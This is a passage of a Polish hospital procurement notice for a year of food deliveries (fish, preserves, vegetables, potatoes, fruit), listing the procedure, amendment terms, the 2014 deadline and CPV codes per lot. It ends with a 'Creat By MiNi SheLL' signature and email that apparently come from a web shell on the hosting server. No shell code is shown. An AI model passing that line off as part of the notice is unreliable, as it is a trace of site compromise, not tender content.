5.2	Wykonawca ma prawo przed upływem terminu składania ofert wycofać się z postępowania poprzez złożenie pisemnego powiadomienia, według tych samych zasad jak wprowadzanie zmian i poprawek z napisem na kopercie WYCOFANIE. Koperty oznakowane w ten sposób będą otwierane w pierwszej kolejności po potwierdzeniu poprawności postępowania wykonawcy oraz zgodności ze złożonymi ofertami. Kopert ofert wycofanych nie będą otwierane.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.  Wszelkie zmiany bądź uzupełnienia niniejszej umowy wymagają formy pisemnej w postaci aneksu pod rygorem nieważności. 
2.  Z uwzględnieniem zapisu art. 144 ust. 1 ustawy Zamawiający przewiduje możliwość dokonania istotnych  zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy oraz  określa warunki tych zmian poprzez wprowadzenie do zawartej umowy następujących aneksów:
a.	aneks cenowy dopuszczający zmianę ceny w przypadku zmiany stawki podatku VAT zgodnie z obowiązującymi przepisami, z tym, że cena brutto może ulec zmianie tylko w stopniu wynikającym ze zmiany stawki podatkowej, zaś cena netto pozostaje bez zmian,
b.	aneks dopuszczający zmianę  oznaczenia  przedmiotu umowy w zakresie nazwy wyrobu  przy zachowaniu jego parametrów, nie zmieniający  ceny  jednostkowej  i wartości umowy,
c.	aneks dopuszczający zmianę umówionego terminu wykonania zamówienia z powodu okoliczności siły wyższej, np. wystąpienia zdarzenia losowego wywołanego przez czynniki zewnętrzne, którego nie można było przewidzieć z pewnością, w szczególności zagrażającego bezpośrednio życiu lub zdrowiu ludzi lub grożącego powstaniem szkody w znacznych rozmiarach,
d.	aneks dopuszczający zmianę umówionego terminu wykonania zamówienia z powodu działań osób trzecich uniemożliwiających wykonanie dostaw, a które to działania nie są konsekwencją winy którejkolwiek ze stron.
3.	W  celu  dokonania  zmian  zapisów  umowy  wnioskowanych  przez  Stronę,  zobowiązana  jest  ona  pisemnie  wystąpić z  propozycją  zmiany  warunków  umowy  wraz z  ich  uzasadnieniem,  z  co najmniej dwutygodniowym wyprzedzeniem.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.gpsk.am.poznan.pl/dzp<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Siedziba Zamawiającego: GPSK UM Poznań ul. Polna 33, budynek E, pokój 104 lub pod adresem poczty elektronicznej: btylska@gpsk.am.poznan.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.05.2014 godzina 09:00, miejsce: Siedziba Zamawiającego przy ulicy Polnej 33 - Kancelaria Ogólna, budynek D, pokój nr 317.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Ryby i przetwory rybne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa ryb i przetworów rybnych.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.24.30.00-3, 03.31.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Przetwory owocowo - warzywne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa przetworów owocowo - warzywnych.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.33.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Warzywa krajowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa warzyw krajowych.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.22.10.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Ziemniaki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa ziemniaków.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.21.21.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Owoce południowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa owoców południowych.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.22.21.10-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Owoce krajowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa owoców krajowych.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.22.23.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com